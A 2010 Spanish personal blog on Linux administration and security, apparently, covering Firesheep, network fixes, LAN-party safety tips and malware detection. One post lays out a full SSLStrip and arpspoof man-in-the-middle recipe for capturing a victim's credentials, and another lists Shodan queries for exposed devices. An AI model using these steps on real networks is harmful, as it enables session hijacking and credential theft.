Google
 

domingo, 5 de diciembre de 2010

Firesheep simplifica el robo de sesión

Buenas,

Firesheep es una extensión de firefox de la que se ha hablado mucho últimamente, pues permite obtener las sesiones de usuario de páginas web como twitter, facebook, ... simplemente escuchando el tráfico.

Apareció en ToorCon 12 para ser usado en redes wireless, pero en hacktimes han demostrado que también se puede utilizar en redes cableadas haciendo un ataque de hombre en el medio.

Inicialmente, sólo está disponible para Windows y Mac pero es posible utilizarlo desde Linux realizando unos breves pasos que encontramos en http://www.tuxapuntes.com/drupal/node/1966:

$> git clone https://github.com/codebutler/firesheep.git
$> cd firesheep
$> git submodule update --init
$> apt-get install autoconf libtool libpcap-dev libboost-all-dev libhal-dev xulrunner-1.9.2-dev aircrack-ng
$> ./autogen.sh && make 


Si da un error de ReferenceError:Cc is not defined es porque no identifica el vendedor de la tarjeta de red, para resolverlo hay que modificar la línea 48 (throw ex) por return string("ERROR"); en el fichero firesheep/backend/src/linux_plattform.cpp

Por último, se habrá creado un fichero en firesheep/build con extensión .xpi que podremos arrastrar a una ventana de Firefox para ser instalado

David

jueves, 4 de noviembre de 2010

Análisis de tráfico

En una nueva entrada de securitybydefault.com viene una Web donde recopilan trazas de tráfico de red para poder ser analizadas.

Por ejemplo, tienen trafico de Conflicker, Zeus, ...


Dos webs interesantes!

lunes, 1 de noviembre de 2010

Mula, el peor negocio de tu vida

Parecía que las noticias sobre las 'mulas' no eran propias de España pero según leo en zonavirus.com la Comunidad Valenciana es tierra de mulas.

lunes, 2 de agosto de 2010

Kubuntu 10.4 knetworkmanager No gestiona

Buenas,

después de un apagón del sistema por falta de batería, al siguiente reinicio network-manager "no gestiona" las redes del equipo.

Esto pasa porque se queda en un estado inconsistente el fichero de estado de knetworkmanager.

Solución en https://bugs.launchpad.net/ubuntu/+bug/555571

# service network-manager stop
# vim /var/lib/NetworkManager/NetworkManager.state

[main]
NetworkingEnabled=true
WirelessEnabled=true

# service network-manager start

¡Es bastante útil!

David

miércoles, 7 de julio de 2010

Como prepararse para una LAN Party

Buenas,

antes de acudir a una LAN Party hay que revisar si nuestro equipo cumple con unos mínimos de seguridad para evitarnos sorpresas. Buscando información al respecto, me acordé de que en la mítica Chaos Communication Congress en su 26 edición tenían una página con recomendaciones.

How to survive (inglés)

Un resumen de estas recomendaciones es:
  • Pon una contraseña a la BIOS
  • Pon una contraseña en GRUB/LILO
  • ¡Nunca dejes una rootshell abierta!
  • ¡Haz una copia de seguridad de tus datos importantes!
  • Vigila tu hardware, o que alguien en quién confies lo haga
  • Piensa en el control de acceso
  • Pon extensiones de seguridad a tu disco duro
  • Considera la utilización de la criptografía y otras herramientas

 Recomendaciones sobre navegar por Internet:
  • Utiliza un navegador seguro y desactiva el javascript o Flash
  • Fijate en las páginas que están cifradas
Navegación sin cifrar
  • No proporciones información privada durante la LAN Party
  • Considera borrar las cookies (puedes hacer una copia de seguridad para luego restaurarlas)
  • Usa la característica de SSH llamada "SOCKS port forwarding"(SSH -D) para hacer un tunel SSH hacia tu red de casa.
Navegación cifrada (HTTPS)
  • Ten cuidado de los ataques MITM, añade una entrada estática en la tabla ARP.
  • No te fíes de las páginas web con errores en certificados. Puede darse el caso que ciertas web no tengan un certificado firmado por una CA conocida, en estos casos, antes de acudir a la LAN Party añade el certificado a tu navegador.
Y esta la añado yo:

  • Piensa antes de darle al botón

David

smbmount sin necesidad de sudo

Buenas,

Para montar un disco en red mediante samba se suele utilizar la herramienta smbmount. Las opciones que yo utilizo son:

$> smbmount '\\IP\carpeta' <<carpeta_local>> -o username=<<usuario>>

Esto nos dará un error de mount.cifs operación no permitida ( mount.cifs operation not permitted.

Lo que tenemos que hacer es poner el bit suid a mount.cifs que es el comando final que se ejecuta en el script smbmount. Por si no sabes que es el bit suid, no usarlo a la ligera!

#> chmod u+s /sbin/mount.cifs
#> chmod u+s /sbin/umount.cifs

David

martes, 6 de julio de 2010

Reducir tamaño imagen desde la consola en Linux

Buenas,

En el mes de noviembre de 2009 escribí un post sobre reducir el tamaño de una imagen con Krita, este es un buen método si sólo tienes que reducir una imagen. Sin embargo, si tienes que reducir varias a la vez existe ImageMagick que permite retocar las imagenes desde la consola. Entre sus funciones está la reducir la resolución de una imagen, y por lo tanto, disminuirá su tamaño.

#> apt-get install imagemagick

Reducir tamaño imagen:

$> convert -resize <resolución> <imagen>
$> convert -resize 800x600 imagen1.jpg

¡Así de fácil!

David

martes, 22 de junio de 2010

VPN con ssh by systemadmin.es

Buenas,


llevo un tiempo siguiendo el blog de systemadmin.es y os lo recomiendo a todos los que utilicéis algún tipo de sistema Unix. Tiene entradas muy potentes y sencillas.

VPN con ssh by sistemadmin.es

David

miércoles, 16 de junio de 2010

viernes, 28 de mayo de 2010

Hotmail: Nuevas medidas de seguridad interesantes

Buenas,

desde el INTECO envía una noticia sobre nuevas medidas de seguridad que se implantarán en el correo de hotmail y entre ellas destaca la posibilidad de adquirir una contraseña de uso único para el acceso a tu cuenta de correo. Muy útil si estamos en ordenadores públicos.


David

sábado, 22 de mayo de 2010

Cortar un mp3 en Linux

Buenas,

Una de las primeras entradas de este blog fue cómo cortar un mp3 en varios trozos en Ubutu, esa solución funciona pero si queremos dividir un mismo archivo mp3 en varias pistas de la misma duración tenemos la herramienta mp3splt.

Se puede descargar de los repositorios de ubuntu y es tan secilla de utilizar como

$> mp3splt -t 3.0 archivo.mp3

Con ese comando se dividirá el archivo en pistas de 3 minutos.

Saludos

domingo, 18 de abril de 2010

Todo Linux Nº 113

Buenas,

nuevo número de la revista TodoLinux, lo anuncio un poco tarde pero este mes está siendo muy ocupado.

En este número escribo un artículo sobre cómo montar un servidor FTP y asegurar las comunicaciones para que terceros no puedan coger nuestros documentos.


David

viernes, 12 de marzo de 2010

Ver fingerprint de servidor SSH

Buenas

aquí queda un recordatorio para ver el fingerprint de un servidor SSH en linux, en concreto para OpenSSH:

$> ssh-keygen -lf /etc/ssh/ssh_host_rsa_key


David

Pd: como me gusta el pez!

sábado, 6 de marzo de 2010

Vulnerabilities Animated Clips

Buenas,

en la lista webappsec la compañía Checkmarx Resarch Labs ha publicado un par de videos para promocionar su herramienta de, lo que parece, análisis estático de código. Los videos están bien porque enseñan de forma muy sencilla dos vulnerabilidades conocidas:



David

miércoles, 3 de marzo de 2010

Todo Linux Nº 112

Buenas,



Todo Linux 112
os anuncio el número 112 de la revista TodoLinux. Este mes colaboro con un artículo sobre la protección de aplicaciones web mediante SSL en Glassfish


Se explica distintos métodos de alojamiento de aplicaciones web en Glassfish:
  • acceso normal.
  • acceso cifrado por SSL con autenticación del servidor.
  • acceso cifrado por SSL con autenticación mediatne del servidor y de los usuarios.
Todavía no he tenido la oportunidad de comprarla, pero veo en la web de la revista que, entre otros, hay un artículo sobre auditoría de redes inalámbricas con backtrack, y además incluyen el dvd con la distribución. ¡A ver cuando la traen a mi quiosco!

David

lunes, 1 de marzo de 2010

Proyecto No More AND 1=1

Buenas,

en estos últimos días se ha oído hablar sobre el proyecto No More AND 1=1, ¿y de qué trata?Pues simplemente es una sencilla aplicación en Java que reúne las típicas cadenas de inyección a aplicaciones web, para así evitar tener que escribirlas continuamente.

Viene con un fichero con unas pocas cadenas de inyección, estaría bien incluir todas las que hemos visto en las security cheat sheet.

David

Pd: también tienen una versión para ser incluida en webscarab

viernes, 26 de febrero de 2010

Crear ficheros con la fecha automáticamente

Buenas,

es algo bastante útil cuando creas scripts para backups dejar la fecha de cuando se realizó la copia de seguridad, como nunca me acuerdo de la sintaxis, aquí queda:

$ echo "Hola Mundo" > "hola_mundo-`date +%d%m%Y_%H%M`.txt"

David

[Libro]Seguridad de Redes - Chris McNab

Buenas,

hoy voy a hacer el primer post sobre comentarios de libros que me lea. La intención es dar mi opinión personal, sin que esto signifique que sea la visión real,  de qué me ha parecido el libro.

El libro en cuestión es:
Seguridad de Redes, de Chris McNab de la editorial Anaya Multimedia(Traducido de O'Really) 2008

Dejando a un lado que en ciertas partes del libro hay frases no entendibles, no por su carácter técnico sino por cómo están redactadas. Es un libro que hace una amplia revisión de todos los posibles ataques a redes pero profundizando poco en la mayoría de ellos, además, lo que menos me ha gustado es que listan muchas vulnerabilidades de productos sin dar una explicación.

Quizá es un libro adecuado para aquellos que se inicien en la seguridad de redes, pero si tienes cierto conocimiento básico no vas a aprender mucho de él.

Puntuación: 2/5

viernes, 19 de febrero de 2010

Tabla ASCII con codigos decimal-hexadecimal

Buenass

harto de buscar todos los días una web para ver una tabla ascii con los códigos decimal-hexadecimal, he decidido imprimirmela en un DINA4. La imagen utilizada ha sido:

la podeis bajar desde http://www.cheat-sheets.org/saved-copy/ascii.png

David

viernes, 12 de febrero de 2010

Another DNS Enumerator by SpiderLabs

Buenas

por casualidad he encontrado un programa sencillo que enumera los registros DNS en base a un diccionario. Útil cuando no podemos utilizar una transferencia de zona. El programa es de SpiderLabs y viene con diccionario, en inglés.

https://www.trustwave.com/spiderLabs-tools.php

El programa es WS-DNS-BFX. Se puede revisar el código fuente para ver cómo está programado.
Podemos añadir al diccionario todos los nombres que queramos, recomendable para DNS no ingleses.
$>  ./WS-DNS-BFX trustwave.com dict-file.txt 10
Progress ...........
$>

Genera un archivo del tipo hosts-<nombre_dominio_consultado>.txt

$> cat hosts-trustwave.com.txt
  -= DNS Brute Force eXtractor by Trustwave - SpiderLabs =-

www.trustwave.com{
204.13.200.166}

ns2.trustwave.com{
204.13.200.161}

mail.trustwave.com{
38.106.143.42}

ns.trustwave.com{
204.13.200.161}

ns1.trustwave.com{
38.106.143.42}

ftp.trustwave.com{
208.42.226.135}

ns3.trustwave.com{
38.106.143.42}

login.trustwave.com{
204.13.200.212}

downloads.trustwave.com{
64.92.221.245}

webmail.trustwave.com{
38.106.143.15}
$> 

David

Presentaciones con LaTeX Beamer

Buenas

ya que he hecho el PFC en LaTeX ¿por qué no la presentación? No hay mucha diferencia, he encontrado un tuto muy sencillo y claro con los comandos básicos:

http://www.cidse.itcr.ac.cr/revistamate/HERRAmInternet/Beamer/BEAMER.pdf

David

jueves, 4 de febrero de 2010

¿Hay malware en mi Windows?

Buenass

leyendo el blog de pentester.es, muy bueno por cierto, tienen una entrada con la opinión de Jose Selvi sobre cómo detectar si sospechamos que tenemos algo en nuestro sistema.

Busca, Busca... Busca Malware bonito...

Los pasos son:

  1. Apagar el equipo y montar el disco en otro sistema para evitar posibles alteraciones de rootkits.
  2. Escaneo de antivirus
  3. Búsqueda de ejecutables, no firmados por microsoft, con Sigcheck de Mark Russinovich: sigcheck -e -s "c:\\"
  4. Centrarnos, en primera instancia en los directorios distintos a Archivos de programa porque ahí habrá bastantes ejecutables no fimados por microsoft.
  5. Análisis de malware con los binarios listados
  6. Y esta la añado yo: Paciencia
David

miércoles, 3 de febrero de 2010

Detectando y eliminando Keyloggers en Windows

Buenas

en el blog de windowstecnico hay una entrada interesante y sencilla sobre detectar y eliminar Keyloggers.
Simplemente hace uso de las herramientas de SysInternals con ProcessMonitor - ProcessExplorer y Autoruns.

Recomendado!

David

jueves, 28 de enero de 2010

SSLStrip fácil sencillo y ...

Buenass

si eres como yo, que habías retrasado la prueba de SSLStrip deja lo que estés haciendo y mira este video de Securitytube sobre SSLStrip o simplemente:
  1. Descarga SSLstrip http://www.thoughtcrime.org/software/sslstrip/
  2.  #>  echo "1" > /proc/sys/net/ipv4/ip_forward
  3.  #>  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  4.  $> python sslstrip.py -w captura_datos_sniff
  5.  #> arpspoof -i eth0 -t IP_Victima IP_router
Y tendrás a tu victima navegando sin SSL y además capturarás sus credenciales.

David

lunes, 25 de enero de 2010

Simple Malware Analyzing

Buenass,


mediante el twitter de securitytube he visto un video donde enseñan de forma sencilla a analizar malware mediante el analisis del flujo de red y de la monitorización de los archivos creados:

Simple Malware Analyzing

David

jueves, 21 de enero de 2010

Diagramas UML multiplataforma

Buenas,

necesito hacer ciertos diagramas UML como de casos de uso, de secuencia, de clases... Buscando por Interné he encontrado Violet UML Editor, que está desarrollado en Java por eso permite utilizarse en cualquier plataforma con máquina virtual Java.

Una característica que me gusta es que puedes copiar al portapapeles el diagrama que estes diseñando, para luego importarlo a Krita o Gimp.

Lo que no me gusta y sería fácil de implementar es que no puedes editar las flechas, es decir, no puedes ajustar los 'brazos' de las flechas para que no se crucen con las cajas.

David

Dual head, dos monitores sin clonar - actualizado

Buenas

haya por octubre de 2009 cuando puse dos monitores escribí el post sobre como poner en Ubuntu dos monitores en dual head. Sin embargo, no incluí en el comando la opción del refresco que es bastante importante porque no es lo mismo que te tome el refresco que quiera, en mi caso 60Hz ha estar con un refresco de 85Hz.

Para cambiarlo solo hay que añadir el modificador --rate, y la órden queda así:

$ xrandr --output VGA-0 --mode 1024x768 --right-of LVDS --rate 85Hz

He tomado el valor del refresco con el comando sin modificadores:
$ xrandr

Screen 0: minimum 320 x 200, current 2304 x 800, maximum 2304 x 800
VGA-0 connected 1024x768+1280+0 (normal left inverted right x axis y axis) 306mm x 230mm
   1024x768       85.0     75.0     70.1     60.0*
   832x624        74.6
   800x600       100.0     85.1     72.2     75.0     60.3
   640x480       100.0     85.0     75.0     72.8     59.9
   720x400        70.1
   640x350        70.1
LVDS connected 1280x800+0+0 (normal left inverted right x axis y axis) 331mm x 207mm
   1280x800       60.0*+   50.0
   1280x720       59.9
   1152x768       59.8
   1024x768       59.9
   800x600        59.9
   640x480        59.4



David

sábado, 16 de enero de 2010

Vim: convierte mayusculas / minusculas de forma sencilla


Buenass,

necesitaba convertir de mayusculas a minusculas constantemente ciertas palabras por lo que intuía que vim tenía que tener una opción que lo automatizase y así es. En el blog de Flasheina hay un post muy breve donde explican cómo conseguirlo, éstos son los pasos sacados del post:

Convertir palabra a mayusculas:
gUw  <-- intuyo que U vendrá de Uppercase y w  de Word

Convertir palabra a minusculas:
guw

Si en vez de convertir una palabra, necesitamos convertir toda la línea se sustitye la 'w' por '$'.

Además, he creado una macro que introducía una cadena al inicio de la frase.

Gracias Flasheina,
David

Nuevo video: Inteco-CERT

Buenas

Nuevo video de Inteco-Cert sobre la aparición de un troyano:




Están muy mal ...

David

jueves, 14 de enero de 2010

Recopilación enlaces Twitter 01

Buenas,

no llevo ni dos días con Twitter y la verdad es que me está gustando bastante. Puedes 'estar en contacto' con aquellos 'cracks' que sigues en sus blogs pero de una forma más directa donde se suele encontrar los links, papers ... que están leyendo e info interesante, que para eso les sigues!!

Os animo a que os hagáis una cuenta y si queréis unios a la mía. Tengo una imagen en la web con mi cuenta.

He decidido hacer una recopilación en el blog con los enlaces más interestantes que postean/posteo, el ritmo es frenético por lo que habrá bastantes post sobre recopilación de enlaces de Twitter. Así que empezamos recopilación:


David

miércoles, 13 de enero de 2010

TodoLinux Nº 110

Buenass

ya tengo en mi casa el nº 110 de la revista TodoLinux. Este mes colaboro con un artículo sobre Comunicaciones seguras en redes Wifi Públicas. Se explica cómo podemos cifrar nuestras comunicaciones para que los fisgones no se enteren de lo que estamos haciendo.

Todavía no he podido leerme la revista completa, pero tiene buena pinta:

  • Alternativa a Apache [leído - buena introducción sobre varios servidores web ligeros]
  • Llamadas de teléfono con Ekiga
  • Debian GNU/kFreeBSD
  • Configurando NFS como sistema de archivos
  • Autoedición de revistas con Scribus [mola]
  • Comunicaciones seguras en redes Wifi Públicas [cool ... xD]
  • El entorno de programación de videojuegos BennuGD
  • Instalación de Lector de DNI electrónico
  • Haiku
  • Alternativas a MySQL



David

lunes, 11 de enero de 2010

Otro más en Twitter

Buenas

me he lanzado a abrirme un twitter que servirá como reemplazo a los últimos post donde solo recomendaba enlaces que me gustaban. Tengo pensado hacer 1 vez al mes una recopilación de los enlaces puestos en twitter y  postearlos en el blog.

Como veis he añadido un widget con el enlace a mi usuario de Twitter.

David

sábado, 9 de enero de 2010

Activar Network Manager en Ubuntu

Buenas,

normalmente tengo configurada la red sin utilizar Network-Manager pero ahora necesito una conexión VPN con mi Universidad y Network-Manager facilita la conexión.

Para permitir a Network-Manager gestionar los dispositivos de red se edita el fichero etc/NetworkManager/nm-system-settings.conf:

#> vim /etc/NetworkManager/nm-system-settings.conf
[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=true


David

lunes, 4 de enero de 2010

Traversecode, blog sobre analisis de malware

Mediante el patrocinio (vease spam) de un blog de uno de los miembros del grupo de
Malware/Spyware/Security-Researchers/Analystsen Linkedin he encontrado un nuevo blog que tiene buena pinta. Lleva 4 post relacionados con el analisis de malware donde detalla de forma técnica varios especimenes de malware que encuentra.

No tienen desperdicio

domingo, 3 de enero de 2010

Shodan: listado de búsquedas

En esta entrada voy a dejar un listado de todas las entradas para shodan que vaya encontrando. En el primer post que hablé sobre shodan, ya puse un listado.


secanalysis.com tienen un listado organizado por categorías que copio aquí:

WebServer Detection

1. IIS+2.0

2. IIS+3.0

3. IIS+4.0

4. IIS+5.0

5. IIS+6.0

6. Websphere+4.0

7. Websphere+5.0

8. Websphere+6.0

9. “Oracle HTTP Server”

10. Jrun

11. RaidenHTTPd

12. “IBM HTTP”

13. Tru64

14. iCern

15. Lotus-Domino + 1.0

16. Apache (tons of versions with this, too many to list)

17. Windweb


CMS Detection

1. Joomla

2. Drupal

3. Wordpress

4. Typo3


Network Device Detection

1. Linksys

1. Linksys+wrt54g

2. Linksys+wap54g

3. Linksys+BEFDSR41w

4. Linksys+BEFSX41

5. Linksys+wap200

6. Linksys+CIT400 (This is a telephony kit...interesting)

7. Linksys+RVS4000

8. Linksys+WET54G

9. Linksys+WAG54GX2

10. Linksys+WAG54GS

2. Netgear

1. Netgear+DG834

2. Netgear+PS121v2

3. Netgear+WGR614v9

4. Netgear+WAG302v2

5. Netgear+DG834PN

3. Cisco

3. Cisco+RVo82

4. Cisco+CSS

5. Cisco+PIX

6. Cisco+VPN

7. Cisco+Server

4. Fuji+Xerox

5. JetDirect
Other

1. Xerver

2. port:23+ list+of+built-in+commands

3. port:80+iisstart.html

4. Server: SQ-WEBCAM

5. “Anonymous+access+allowed”

6. Golden+FTP+Server

7. “Server:+iWeb”+HTTP

8. passwd

9. passwd+user+vname

10. deleted

Pd: si teneis vuestros propios listados ponedlos por aquí